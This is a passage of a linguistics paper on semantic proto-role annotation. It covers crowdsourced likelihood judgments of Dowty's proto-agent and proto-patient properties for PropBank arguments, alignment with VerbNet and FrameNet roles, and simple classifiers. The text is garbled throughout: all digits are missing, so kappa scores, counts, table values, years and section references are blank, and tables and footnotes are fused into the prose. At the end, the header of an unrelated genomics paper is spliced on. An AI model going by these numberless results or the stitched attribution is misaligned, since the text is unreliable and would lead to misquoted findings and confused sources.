efforts. for example, resources such as the pattern dictionary of english verbs (hanks, ), currently in progress, could be supplemented by our sprl annotations. (the pdev will contain valency patterns for thousands of verbs along with restrictions on the semantic types of their arguments based on (pustejovsky et al., )’s ontology.) also important is early connectionist work, which proposed “semantic micro- features” to model semantic role generalizations; see e.g. hin- ton ( ; ) and mcclelland and kawamoto ( ). ing to their syntactic behaviors. beyond this group- ing, which includes a shallow semantic parse frame, verbnet provides its own semantic role labels, and a neo-davidsonian-inspired logical form. all infor- mation within verbnet is class-specific; the frames and roles apply equally to all verbs within a class. further, verbnet’s lexical entries allow for assign- ing selectional restrictions on thematic roles, e.g. re- quiring a participant be concrete, or animate. while these restrictions take the form of properties, the thematic roles themselves are left categorical. bonial et al. ( ) united verbnet’s semantic roles with those of lirics , a standardization ef- fort to facilitate multilingual nlp. motivated in part by the properties of dowty, they constructed a hi- erarchy of roles interrelated through their prop- erty requirements, implicit in the organization of the hierarchy paired with natural language role defini- tions. the properties bundled into these roles are then taken taken to be type-level, hard constraints: they cannot reflect semantic nuances within individ- ual sentences, and are strictly boolean (a property cannot hold to a degree, or with some uncertainty). the semlink project (loper et al., ) provides a mapping between verbnet, propbank, framenet (see below) and wordnet (fellbaum, ). cru- cially for our work (see § ), semlink provides a mapping from the role hierarchy of bonial et al. ( ) to the argument annotations of propbank. verbcorner verbcorner (hartstone et al., ; hartshorne et al., ) is an on-going effort to val- idate verbnet’s semantic annotations, focusing at a finer-grained level of role information. for a partic- ular verb and semantic features, annotators are pro- vided context through a small, made-up story. an- notators then read example sentences pulled from verbnet and determine whether those sentences vi- olate the contextual expectations. as with the present work, verbcorner crowd-sources the anno- for instance, the lemmas break and shatter are both mem- bers of the same class (break- . ), capturing the causative alternation. both senses can be used transitively (“john broke/shattered the mirror”) or intransitively (“the mirror broke/shattered.”), while semantic roles assign john to agent and the mirror to patient in both syntactic frames, capturing the logical entailment of a resulting degraded physical form. linguistic infrastructure for interoperable resources and systems (lirics): http://lirics.loria.fr/ tation, though there are key differences: hartstone et al. ( ) are focused on logical entailments (what must be true) whereas we are focused on strongly suggested implications (what is likely to be true). framenet the berkeley framenet project (baker et al., ) is an instantiation of fillmore’s frame semantic theory (fillmore, ). framenet de- scribes events via a frame, consisting of lexical triggers and semantic roles that are expected to be filled. this is similar to propbank’s take on predi- cate/argument structure, though there are significant differences: ( ) framenet triggers may be mul- tiword, verbal or nominal expressions; ( ) unlike propbank, framenet defines interframe relations; ( ) framenet is extremely fine-grained (embraces role-fragmentation), opting for semantic complete- ness rather than annotator ease. framenet has in- spired semantic role labeling (gildea and jurafsky, ; litkowski, ), in addition to frame seman- tic parsing (baker et al., ; das et al., ). experimental setup the literature review makes clear that understanding and annotating fine-grained role properties is valu- able in both linguistic theory and in computational linguistics: under many sets of assumptions, such properties ground out the theory of coarse-grained roles. we follow hartstone et al. ( ) in directly addressing fine-grained properties, here in the con- text of the proto-role theory. the proto-role ap- proach gives us a set of testable questions to as- sess on a corpus. we focus on two main issues: (i) whether the proto-role solution to the mapping prob- lem scales up to very large sets of data, and (ii) the prediction that there will be a very large set of prop- erty configurations attested as roles in a large data set. if the predictions from the proto-role theory are true, then we conclude that a large data set annotated with fine-grained role properties may be valuable in tasks related to semantic roles and event detection. to assess these predictions, we broadly follow kako ( b) in operationalizing proto-roles using likelihood questions targeting specific role proper- ties in sentences of english. this paper presents two experiments that implement this strategy. in the re- mainder of this section we describe the general setup of the experiments. in particular, we describe a pro- role property q: how likely or unlikely is it that... instigated arg caused the pred to happen? volitional arg chose to be involved in the pred? awareness arg was/were aware of being involved in the pred? sentient arg was sentient? moved arg changes location during the pred? phys existed arg existed as a physical object? existed before arg existed before the pred began? existed during arg existed during the pred? existed after arg existed after the pred stopped? changed poss arg changed possession during the pred? changed state the arg was/were altered or somehow changed during or by the end of the pred? stationary arg was stationary during the pred? table : questions posed to annotators. cess for arriving at the specific fine-grained property questions we ask, the creation of the data set that we ask the questions about, the task that mechanical turkers are presented with, and the manner in which we analyze and display the results. we first inspected the role hierarchy of bonial et al. ( ) along with the associated textual defini- tions: these were manually decomposed into a set of explict binary properties. for example, we define the semlink actor role as a participant that has the binary property of instigation. from these properties we subselected those that were most sim- ilar to the original questions proposed by dowty (see table ). for each such property we then generated a question in natural language to be posed to anno- tators given an example sentence (see table ). the set we report on here represents a subset of the ques- tions we have tested; in ongoing work we are eval- uating whether we can expand dowty’s set of ques- tions, e.g. to capture roles such as instrument. methods because we are interested in the poten- tial impact of dowty’s proto-roles theory on human language technologies, we perform a number of re- lated crowdsourcing experiments, with the dual aim of validating the existing (psycho-)linguistic litera- ture on proto-roles as well as piloting this highly scalable framework for future decompositional se- mantic annotation efforts. all of the crowdsourcing experiments in this pa- per are run using amazon mechanical turk, and (ex- cept for the kappa scores reported for experiment ) all workers were recruited from the mturk worker pool. the basic setup of the experiments in sec- tions and is the same. the mechanical turk worker is presented with a single sentence with a highlighted verb and one highlighted argument of that verb. then the worker answers all of the ques- tions in table for that verb-argument pair using a likert scale from to , with the response labels: very unlikely, somewhat unlikely, not enough infor- mation, somewhat likely, and very likely (see figure ). each mechanical turk hit yields responses for all the questions in table applied to a single verb- argument pair. the mechanical turk experiments are run with two types of sentences: those with real verbs and nonsense (“nonce”) arguments, and those with entirely real english sentences. section dis- cusses the former “type-level” hit with nonce argu- ments, while section discusses the latter “token- level” annotation task with real arguments. figure : example hit question with nonce arguments. data to obtain verb-argument pairs for the task described here, we drew sentences from the subset of propbank that semlink annotates for verbnet roles. from these, we removed verbs annotated as participles, verbs with trace arguments, verbs under negation or modal auxiliaries, and verbs in embed- ded clauses to ensure that annotators only saw verbs in veridical contexts – contexts where logical op- erations such as negation do not interfere with di- rect judgments about the verbs. for example, in john didn’t die, negation reverses the change-of- state judgment for the whole sentence, despite that being part of the meaning of the verb die. we also re- moved clausal arguments, as most of the questions in table do not make sense when applied to clauses; in ongoing work we are considering how to extend this approach to such arguments. a total of , verb tokens with , argument spans from , sentences remained after applying these filters. analysis to evaluate whether the results of the following experiments accord with dowty’s pro- posal, we follow kako ( b) in taking the mean difference between the property ratings of the sub- ject and object across sentences; see § . . we present these differences in the same format as in figure . here we stick with kako’s evaluation of the results, in order to demonstrate the convergence of the linguistic and psycholinguistic evidence with computational linguistic approaches; our immedi- ate goal in the present work is not to advance the methodology, but to show that these techniques can be pursued through large-scale crowdsourcing. we perform two mechanical turk experiments on verbs: one with nonce arguments, and one with real data in section . because nonce arguments have no meaning in their own right, we assume that the properties that annotators assign these arguments are a function of the verb and role, not the argument it- self. hence, we assume that these annotations are at the verb-role type level. conversely, the experi- ment in section are at the token level, because all arguments have real english instantiations. experiment : nonce-based the first experiment we run with nonce arguments is an attempt to replicate the results of kako ( b). recall that kako ( b) upholds the psychological validity of dowty ( )’s argument selection prin- ciple, by demonstrating that human subjects assign proto-agent and proto-patient properties to gram- matical subject and object arguments according to dowty’s prediction. (see figure .) in this experiment, we generate simple transitive sentences with a small set of real verbs and nonce arguments. the set of verbs are precisely those se- lected by kako ( b) in his first experiment: add, deny, discover, finish, find, help, maintain, mention, pass, remove, show, write. the questions we ask workers to answer come from a slightly expanded set of proto-role properties. there were partic- as pointed out by a reviewer, a verb in a nonce sentence is potentially ambiguous. because we constructed the nonce sentences from actual frames in propbank examples, an anno- tator will have at least coarse cues to the intended sense. in this respect we follow kako, and established protocol in nonce ex- periments in general. we leave the effect of sense ambiguity on nonce property judgments for future work. ipants in the experiment, recruited from the mturk worker pool, each completing . hits on average. the results of this experiment, broadly, repli- cate kako ( b)’s earlier findings: human anno- tators on average indicate that, within the same sen- tence, the subject-position argument is more likely to have proto-agent properties than the object- position argument, and the object-position argument is more likely to have proto-patient properties than the subject-position argument. this finding is illus- trated in figure . in addition, the basic facts match kako’s original finding; compare figures and . (our instigation property is equivalent to kako’s caused change property, and we do not have an analogue of his caused do property.) proto- agent properties have a greater effect than proto- patient properties, and causation, volition, and awareness are all strong proto-agent properties. creation and stationary are all weaker, but non-zero, proto-patient properties for these verbs. there are some differences that are apparent. first of all, where kako did not (in this particular experi- ment) find an effect of change of state, we did; this is broadly consistent with kako’s overall find- ings. we did not get an effect for movement or for physical existence in this experiment, in con- trast to kako’s results. proto−agent proto−patient stationary changed_state changed_possession destroyed created physically_existed moved sentient awareness volitional instigated − − mean difference (subject − object) figure : mechanical turk results for the nonce exper- iment. a positive value for a property indicates that, on average, subject-position arguments received a higher score for that property than object-position arguments. our ability to replicate kako ( b) is signifi- cant for two reason: (i) it lends further credence to the proto-role hypothesis, and (ii) it establishes that crowd-sourcing with non-experts in a less controlled situation than a formal experiment results in reason- able annotations for this task with minimal training. experiment : corpus-based can this result extend to real corpus data? if so, the proto-role theory can lead to a valuable source of annotation information about thematic roles. to as- sess this, we moved from a synthetic nonce task to a much larger scale version of the task using data from propbank (palmer et al., ). each item in this task presents the annotator with a propbank sen- tence with the predicate and argument highlighted, and asks them the same questions about that actual sentence. the sentences were sampled from prop- bank as described in § . our primary goal in this collection effort was to obtain internally consistent, broad-coverage annota- tions. thus we worked through a number of pilot annotation efforts to determine cross-annotator reli- ability between annotators and with our own judge- ments. from the final version of our pilot we se- lected a single annotator with strong-pairwise agree- ment amongst the other most prolific annotators. compared to the five other most prolific annota- tors in our final pilot, the pair-wise average cohen’s kappa with squared metric on an ordinal interpreta- tion of the likert scale was . . in our large-scale annotation task, we have col- lected property judgments on over , arguments of near , verb tokens, spanning , propbank rolesets. this represents close to hours of anno- tation effort. the results are shown in figure . be- cause some arguments in propbank are abstract, for which many of the questions in table do not make sense, we added an additional response field that asks “does this question make sense” if the worker gives a response lower than (figure ). figure shows the results with n/a responses removed. for presentation purposes, we convert the temporal exis- tence properties to creation and destruction. discussion the overall results substantially re- semble both kako’s original results and our experi- based on a set of verbs selected based on frequency in the childes corpus, filtering for verbs that had enough to- kens in propbank; want. , put. , think. , see. , know. , look. , say. , take. , tell. , and give. . one of those five annotators had less stable judgements than the rest, which we identified based on a pair-wise kappa score of only . with our final annotator. if removing that annotator the average pair-wise score with the remaining four annotators then rose to . . proto−agent proto−patient stationary changed_state changed_possession destroyed created physically_existed moved sentient awareness volitional instigated − − mean difference (subject − object) figure : mechanical turk results for experiment . proto−agent proto−patient stationary changed_state changed_possession destroyed created physically_existed moved sentient awareness volitional instigated − − mean difference (subject − object) figure : experiment with n/a removed. figure : an additional response field appears for ques- tions that might not be applicable. (example sentence for this question: “the antibody then kills the cell.”) ment .as predicted, the proto-agent properties are predictors of whether an argument will be mapped to subject position, and the proto-patient proper- ties similarly predict objecthood. not all proper- ties are equal, and on this much larger data set we can clearly see that instigation (causation) is the strongest property. because we have many data points and a reliable annotator, the variance on this data is much smaller. this graph confirms the the proto-role hypothesis over a large corpus: fine- grained role properties predict the mapping of se- mantic roles to argument position. this data set puts us in a position to ask a wide range of followup questions about the nature of thematic roles, many of which we cannot adddress in the present paper. the central question we do address here is about property configurations: since each property con- example rtg (a) he earned a master’s degree in architecture from yale. n/a (b) the bridge normally carries , commuters a day. (c) baskets of roses and potted palms adorned his bench. table : stationary examples from experiment . figuration represents a coarse-grained role, we can ask what the distribution of property configurations is over this corpus. dowty’s prediction is that we should see some clustering around common config- urations, but a long tail representing role fragmenta- tion. the prediction of classical approaches is that we should see only the common configurations as clusters, with no long tail. we turn to this issue in the following sections, comparing our role annota- tions also to roles in verbnet and framenet (using semlink as the mapping among the three data sets). one key difference from dowty’s predictions is that stationary appears to act as a proto-agent property. first, we are using a slightly different no- tion of stationary to dowty, who proposed that it be relative to the event – in this we follow kako. second, our movement property is really about change of location (see table ) and so is not the negation of stationary. third, our corpus is heav- ily biased to non-physical events and states, where the notion of motion does not apply, and so in this respect may not be fully representative of a more naturalistic corpus. within the relatively small pro- portion of data that is left, we find that objects do not tend to be stationary, and so if this is correct, it may simply be wrong to classify the absolute version of stationary as a proto-patient property. three ex- amples from the data set are shown table , for each case – the result is that once n/a responses are ex- cluded, examples such as (b) are still more the norm than examples such (c). annotation quality to assess annotation quality we began with a stratified sample based on each propbank argument id in the set { , , , , , }. local researchers each then answered questions over this sample. one of the authors participated, while argument ids are meant to be meaningful when con- ditioned on a roleset, the values still correlate with the “core- ness” of an argument even when independent of roleset (e.g., argument ids and are most likely to be agent and pa- tient): our stratification aimed to survey across both “core” and “peripheral” argument role types. rank lo g ( f re qu en cy ) figure : distribution of property configurations in ex- periment . to obtain categorical roles for purposes of comparison, responses of / were mapped to / , giv- ing configurations on properties over what we might coarsely consider: {false ( ), unknown ( ), true ( )}. achieving a kappa score of . with the annota- tor. two colleagues generally familiar with thematic roles but without prior experience with the protocol or our goals achieved scores of . and . . fi- nally, a colleague who speaks english as a second language acheived a kappa score of . . these correlations, along with our initial selection criteria for the annotator, and then combined with those cor- relations observed in table (discussed below), sug- gests our process resulted in a useful resource which we will release to the community. in section we additionally provide a qualitative indicator of annotation quality, in the form of an alignment to verbnet roles. comparison to other rolesets a prediction emerging from the proto-role hypoth- esis is that, when a set of role-relevant properties such as those in table are tested on a large scale, we should not find clean role-clusters. we do ex- pect to find certain common role-types appearing frequently, but we also expect there to be a long tail of combinations of properties. this is exactly what we find when examining our results. figure shows the frequency of property configurations in the data set. around configurations are attested, with nearly % of those making up the tail. the proto-role hypothesis predicts that there are natural sentences in which an argument can be agent/patient-like, yet be missing one or more proto-agent/patient properties. this is what gives rise to the observed long tail of property configu- rations: cases that would otherwise be lumped to- gether as, e.g., agent, are instead placed in a more diverse set of bins. while dowty’s theory is really about roles at the type-level, these bins are also use- ful for understanding role annotations at the token level, i.e. capturing exactly those properties that hold of the given argument in context. table shows three real-world sentences taken from the wall street journal involving the verb kill. each sentence has what propbank would call a kill. , arg -pag, or the first argument of the roleset kill. , a particular sense of the word kill. further, each of these arguments are labeled as a verbnet agent and framenet killer/cause through semlink. these sentences were selected purely because they were the only instances of kill in our dataset with semlink role annotations. then, when examining our annotations for these argu- ments, we find that our motivations from § for this enterprise are justified. at the token level, there are robust inferences leading to different results on each example for key proto-role properties, but in each case the subject is still a better proto-agent than the object. from this triplet, we learn that the subject of kill needn’t be volitionally involved (as in the acci- dental death in a), needn’t be aware of the killing, and even need not be sentient. the present anno- tation scheme, in contrast to the coarse label pro- vided to these examples in verbnet, captures this variation while still allowing inference to type-level properties of the verb kill. (these examples also clearly illustrate the degree to which noun seman- tics can influence thematic role-related judgments when carried out on natural data, something the fine- grained approach allows us to explore directly.) we can also clearly see from this triplet that instiga- tion is constant across examples, as is physical existence. interestingly, the example (b) shows that killing does not even preclude the continuation pag is a recent addition to propbank semantics, standing for proto-agent but interpreted as an unweighted disjunction of features: “it acts volitionally, is sentient, or perceives, causes a changes of state, or moves” (kübler and zinsmeister, ). another addition, ppt, stands for proto-patient. while moti- vated by dowty’s terminology, these additions do not capture the individual property-based notion we advocate for here. sentences property (a) (b) (c) (a) she was untrained and, in one botched job killed a client. instigated (b) the antibody then kills the cell. volitional (c) an assassin in colombia killed a federal judge on a medellin street. awareness propbank kill. , arg -pag: killer sentient verbnet murder- . - , agent: actor in an event who initiates and carries out the event intentionally or consciously, and who exists independently of the event moved phys existed created destroyed framenet killing, killer/cause: (the person or sentient entity) / (an inanimate entity or process) that causes the death of the victim. changed poss changed state stationary table : comparison of role annotations for kill across resources. ratings: =very unlikely, =very likely. sentences property (a) (b) (c) (a) the stock split four-for-one on oct. . instigated (b) “in , the pair split the company in half, with walter and his son, sam, agreeing to operate under the merksamer jewelery name.” volitional awareness (c) the company downplayed the loss of mr. lesk and split his merchandising responsibilities among a committee of four people. sentient moved propbank split. , arg -ppt: thing being divided phys existed verbnet split- . , patient: undergoer in an event that experiences a change of state, location or condition, that is causally involved or directly affected by other participants, and exists independently of the event. created destroyed changed poss framenet cause to fragment, whole patient: the entity which is destroyed by the agent and that ends up broken into pieces. changed state stationary table : comparison of role annotations for split across resources. of existence after the event, so the existence prop- erty may not be fully independent. table makes a similar point using the verb split. these three instances of split, labeled with the same role (and verb sense) in propbank/verbnet, show clear differences in terms of fine-grained role prop- erties. (note also that in (a), a propbank arg ap- pears in subject position.) while there is consensus on change of state, there is variation in whether the argument is destroyed, changes posses- sion, and is aware of its involvement in the event. alignment with verbnet in what follows we ex- plore a non-exact mapping where we have taken sen- tences in semlink annotated with verbnet coarse- grain roles, and simply projected the mean - proto-role ratings (subtracting n/a) onto each role. this serves two purposes: ( ) the quality of this mapping serves to verify the quality of the proto- role annotations, and ( ) this alignment helps com- pare between coarse and fine-grained role annota- tions. this alignment is a proof-of-concept, and we leave a deeper exploration of ways of doing this sort of alignment for the future. table shows the full alignment. a value of indicates that the role tends to determine the proto-property positively, i.e. agents are extremely likely to be judged as insti- gators. a value close to indicates that the role is neutral with respect to the proto-property, e.g. agents may or may not move. a value close to indicates that the arguments with that role are likely to have the negative version of the proto-property, e.g. agents tend not to change possession. at a broad level the results are strong, though we will not be able to discuss every detail here. in this alignment the judgments of n/a have been removed. in the case of e.g. the instigation value for theme, this supports interpreting the role as assigning no value to instigation at all; similarly for some of the other values for theme. in some this is not the only way to treat n/a ratings, and we will leave a full exploration to future work. role freq instigated volitional awareness sentient moved existed created destroyed chg poss chg state stationary agent . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) theme . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) patient . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) experiencer . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) stimulus . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) topic . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) destination . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) recipient . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) extent — ( ) — ( ) — ( ) — ( ) — ( ) — ( ) . ( ) . ( ) — ( ) . ( ) — ( ) ... roles omitted ... instrument . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) initial loc. . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) beneficiary . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) material . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) predicate — ( ) . ( ) . ( ) — ( ) — ( ) — ( ) . ( ) . ( ) — ( ) . ( ) — ( ) asset — ( ) — ( ) — ( ) — ( ) . ( ) . ( ) . ( ) . ( ) . ( ) . ( ) — ( ) table : high and low frequency verbnet roles (via semlink) aligned with mean property ratings when excluding n/a judgments. freq provides the number of annotations that overlapped with a role. in parenthesis is the number of cases for that property which were judged applicable (not n/a). e.g. we annotated , arguments that semlink calls agent, where , of those were deemed applicable for the instigation property, with a mean response of . . mid-frequency roles are omitted here for space reasons; the full alignment is provided with the dataset for this paper. cases with large numbers of n/a responses, e.g. the awareness and sentient properties for theme, the provided mean is high, suggesting the role may be more heterogeneous than would otherwise appear. in lieu of an exhaustive discussion, we will moti- vate the alignment with several interesting examples of awareness. awareness tended to be rated highly. table gives a range of examples illustrat- ing particular tokens of judgements relative to verb- net roles. in (a-c) we give three straightforward examples where the bolded argument was judged to be aware of involvement in the event. abstract enti- ties such as companies were consistently annotated as having the potential to be aware. consequently, in b for example, ford is annotated as being aware that mazda makes the tracer for the company. in these cases, it is intuitively right at the token level that the participant is likely to be aware of their involvement in the event, but this does not mean that we can con- clude anything about the role; for example, for ben- eficiaries and instruments we have only a few examples of the awareness property. in c-e, we have given three examples of different ratings for awareness focusing on the destina- tion role. all three ratings are intuitively straight- forward at the token level; in d the recipient of the cases (the court) may not yet be aware of the deci- sion. in e the recipient of the sprinkling was a baby and therefore was quite unlikely to be aware of her rtg (role) example a (agent) they worry about their careers, drink too much and suffer [...] b (beneficiary) mazda makes the tracer for ford. c (destination) commercial fishermen and fish processors filed suit in federal court [...] d (destination) but the court [...] sent the cases back to fed- eral district court in dallas. e (destination) when the good fairy [...] hovered over the cradle of edita [...], she sprinkled her with high e flats, [...] f (instrument*) guests bring movies on tape , and show their favorite three-to-five minute segments on the screen [...] table : examples of awareness: how likely is it that the bold argument is aware of being involved in the event? potential future singing career (a fact about the con- text and argument more than the verb). f helps illus- trate the quality of our annotations: personal com- munication with semlink researchers verified that we discovered a rare bug via our process. semantic proto-role labeling srl systems are trained to predict either: (i) a predicate or frame specific notion of role (e.g., framenet), or (ii) a cross-predicate, shared notion of role (e.g., propbank). (i) allows for fine-grain distictions specific to a single predicate, but risks data sparsity (needing many examples per predi- cate). (ii) allows for sharing statistics across pred- icates, but requires careful, manual cross-predicate the role via semlink should be agent. instigated volitional awareness sentient moved null . . . . . pos . . . . . full . . . . . existed created destroyed chg poss chg state stationary . . . . . . . . . . . . . . . . . . table : test classification accuracies for each property. analysis to ensure equivalent role-semantics (loper et al., ), and as in seen tables and it may not be feasible to ensure exact equivalence. our approach addresses this challenge by drop- ping the notion of categorical role entirely, replacing it with responses to proto-role questions that can be shared across all arguments and predicates. fur- ther, as likelihood judgements may be interpreted as scalars, then this may provide a smoother represen- tation for prediction and downstream use, akin to the recent push to replace categorical “ -hot” word rep- resentations with vector-space models. as an example sprl model, we trained separate log-linear classifiers with l regularization on the judgments of each property in the results from ex- periment . as in fig. we collapsed ratings to a categorical { , , }, and included n/a, for a resul- tant -way classification problem. the , ar- guments that appear in the dataset were divided into training ( , ), development ( ), and test ( ). we trained three models: null, with only an intercept feature ; pos, which adds as a feature the linear offset of the argument relative to the verb (as a coarse proxy for syntactic structure); and full, which added a vector embedding of the verb (rastogi et al., ). even with this basic model we see evidence of learning property-specific distributions across verbal predicates, such as for changed state. e.g., the notions of actor, agent, and even patient may overlap in their underlying properties. e.g., the proto-agent of build will be related but not identi- cal to that of kill: where commonalities exist, predictive models can benefit from the overlap. future work on prediction may explore alternative formu- lations, such as a -step process of first predicting n/a, then performing regression on likelihood. the null classifier predicts a rating of for created and destroyed and n/a for all the other properties. http://cs.jhu.edu/˜prastog /mvlsa/ conclusions and future work in this paper we have adopted from theoretical lin- guistics the idea that thematic roles should be de- composed into more fine-grained properties that have a prototype structure – the proto-role hypoth- esis. we developed an annotation task based on this idea, and tested it both in a smale scale nonce-based version and a very large scale version using real data from propbank(/wsj). one main result is that the proto-role hypothesis holds true at this very large scale. a second result is that, at this scale we gain evidence for a substantial amount of ‘role fragmen- tation’ in the lexicon of english: we find approx- imately discrete property configurations. the proto-role approach allows us to cope with fragmen- tation by focusing on the fine-grained properties that make up roles. we showed this allows a greater de- gree of accuracy in role annotations, for example handling variability in fine-grained properties across tokens of a verb in a corpus that lead to coarse- grained categorization challenges. finally, we have shown it practical to directly annotate a corpus with fine-grained properties and produced a large collec- tion of such annotations, which we release to the community. we are currently expanding the annota- tion set beyond wsj, and beyond english, as well as applying it to theoretical questions about verb class and argument structure (davis and koenig, ; kako, b), along with word sense. finally, we are building on the baseline model in § to more broadly investigate how decompositional semantic annotations can guide linguistically motivated rep- resentation learning of meaning. acknowledgments great thanks to martha palmer, tim o’gorman, scott grimm, and the reviewers for their feedback; robert busby for annotations; julian grove for work on a predecessor project with kyle rawlins. thanks to sanjeev khudanpur, john j. godrey, and jan hajic̆, as well as jhu and charles university for coor- dinating the fred jelinek memorial workshop in , supported by nsf pire ( ). support came from an nsf graduate research fellowship, darpa deft fa - - - (large scale paraphrasing for natural language understanding), the jhu hltcoe, the paul allen institute of artificial intelligence (acquisition and use of paraphrases in a knowledge-rich setting), and nsf bcs- (gradient symbolic computation). http://cs.jhu.edu/~prastog /mvlsa/ references afra alishahi and suzanne stevenson. . a compu- tational model of learning semantic roles from child- directed language. language and cognitive pro- cesses, ( ): – . collin f. baker, charles j. fillmore, and john b. lowe. . the berkeley framenet project. in proceed- ings of the international conference on computational linguistics, pages – . collin baker, michael ellsworth, and katrin erk. . semeval’ task : frame semantic structure extrac- tion. in proceedings of the th international workshop on semantic evaluations, pages – . association for computational linguistics. frank r. blake. . a semantic analysis of case. in james t. hatfield, werner leopold, and a. j. friedrich ziglschmid, editors, curme volume of linguistic stud- ies, pages – . linguistic society of america. claire bonial, william corvey, martha palmer, volha v. petukhova, and harry bunt. . a hierarchical uni- fication of lirics and verbnet semantic roles. in se- mantic computing (icsc), fifth ieee interna- tional conference on, pages – , september. greg n. carlson and michael k. tanenhaus. . thematic roles and language comprehension. in w. wilkins, editor, syntax and semantics: thematic relations. academic press. greg n. carlson. . thematic roles and their role in semantic interpretation. linguistics, pages – . xavier carreras and lluı́s màrquez. . introduction to the conll- shared task: semantic role label- ing. in proceedings of the ninth conference on com- putational natural language learning, pages – . association for computational linguistics. hector-neri castañeda. . comments on donald davidson’s ‘the logical form of action sentences’. in nicholas rescher, editor, the logic of decision and action. university of pittsburgh press. noam chomsky. . lectures on government and binding. foris publications. w. croft. . syntactic categories and grammatical relations. university of chicago press. d. cruse. . some thoughts on agentivity. journal of linguistics, : – . dipanjan das, nathan schneider, desai chen, and noah a. smith. . probabilistic frame-semantic parsing. in proceedings of human language tech- nologies conference of the north american chapter of the association for computational linguistics, pages – . a. r. davis and j.-p. koenig. . linking as con- straints on word classes in a hierarchical lexicon. lan- guage, : – . david dowty. . on the semantic content of the notion ‘thematic role’. in barbara partee, gennaro chierchia, and ray turner, editors, properties, types and meanings, vol ii. kluwer. david dowty. . thematic proto-roles and argument selection. language, ( ): – . christiane fellbaum. . wordnet. wiley online li- brary. charles fillmore. . towards a modern theory of case. the ohio state university project on linguistic analysis report , the ohio state university. charles j. fillmore. . frame semantics and the na- ture of language. in annals of the new york academy of sciences: conference on the origin and develop- ment of language and speech, volume , pages – . charles fillmore. . frame semantics. linguistics in the morning calm, pages – . daniel gildea and daniel jurafsky. . automatic la- beling of semantic roles. computational linguistics, ( ): – . scott grimm. . the lattice of case and agentivity. msc thesis, university of amsterdam. scott grimm. . semantics of case. morphology, : – . jeffrey s. gruber. . studies in lexical relations. ph.d. dissertation, massachusetts institute of technol- ogy. patrick hanks. . lexical analysis: norms and ex- ploitations. mit press. joshua k. hartshorne, claire bonial, and martha palmer. . the verbcorner project: findings from phase of crowd-sourcing a semantic decomposition of verbs. in proceedings of the annual meeting of the associ- ation for computational linguistics, pages – . association for computational linguistics. joshua hartstone, claire bonial, and martha palmer. . the verbcorner project: toward an empirically-based semantic decomposition of verbs. in proceedings of the conference on empirical meth- ods in natural language processing, pages – . geoffrey e. hinton. . implementing semantic net- works in parallel hardware. in geoffrey e. hinton and john a. anderson, editors, parallel models of asso- ciative memory. erlbaum, hillsdale, nj. geoffrey e. hinton. . learning distributed repre- sentations of concepts. in proceedings of the eighth annual conference of the cognitive science society, pages – . amherst, ma. ray s. jackendoff. . semantic interpretation in generative grammar. the mit press. ray s. jackendoff. . the status of thematic relations in linguistic theory. linguistic inquiry, : – . edward kako. a. the semantics of syntactic frames. language and cognitive processes, ( ): – . edward kako. b. thematic role properties of sub- jects and objects. cognition, : – . sandra kübler and heike zinsmeister. . cor- pus linguistics and linguistically annotated corpora. bloomsbury publishing. beth levin and malka rappaport hovav. . argu- ment realization. cambridge university press. beth levin. . english verb classes and alter- nations: a preliminary investigation. university of chicago press. ken litkowski. . senseval- task: automatic label- ing of semantic roles. in senseval- : third interna- tional workshop on the evaluation of systems for the semantic analysis of text, pages – . edward loper, szu-ting yi, and martha palmer. . combining lexical resources: mapping between prop- bank and verbnet. in proceedings of the th interna- tional workshop on computational linguistics. mitchell p marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . james l. mcclelland and alan h. kawamoto. . mechanisms of sentence processing: assigning roles to constituents. in david e. rumelhart and james l. mcclelland, editors, parallel distributed processing: explorations in the microstructure of cognition, vol. . mit press, cambridge, ma. martha palmer, dan gildea, and paul kingsbury. . the proposition bank: a corpus annotated with se- mantic roles. computational linguistics, : – . terence parsons. . events in the semantics of en- glish. mit press, cambridge, ma. james pustejovsky, patrick hanks, and anna rumshisky. . automated induction of sense in context. in proceedings of the international conference on com- putational linguistics. malka rappaport and beth levin. . what to do with theta roles. in w. wilkins, editor, syntax and seman- tics : thematic relations, pages – . academic press. malka rappaport hovav and beth levin. . building verb meanings. in m. butts and w. geuder, editors, the projection of arguments: lexical and composi- tional factors, pages – . csli publications. pushpendre rastogi, benjamin van durme, and raman arora. . multiview lsa: representation learn- ing via generalized cca. in proceedings of the an- nual meeting of the north american chapter of the association for computational linguistics. karin kipper schuler. . verbnet: a broad cover- age, comprehensive verb lexicon. ph.d. dissertation, university of pennsylvania. leonard talmy. . figure and ground in complex sentences. in joseph greenberg, editor, universals of human language, pages – . stanford univer- sity press. ralph weischedel, martha palmer, mitchell marcus, ed- uard hovy, sameer pradhan, lance ramshaw, ni- anwen xue, ann taylor, jeff kaufman, michelle franchini, mohammed el-bachouti, robert belvin, and ann houston. . ontonotes release . ldc t . linguistic data consortium, philadel- phia, pa. submitted october accepted may published june corresponding authors ghazaleh khodabandelou, ghazaleh.khodabandelou@u-pec.fr, ghazaleh.khodabandeh@gmail.com julien mozziconacci, julien.mozziconacci@mnhn.fr academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright khodabandelou et al. distributed under creative commons cc-by . open access genome annotation across species using deep convolutional neural networks ghazaleh khodabandelou , , etienne routhier and julien mozziconacci , , laboratoire de physique théorique de la matière condensée (lptmc), sorbonne 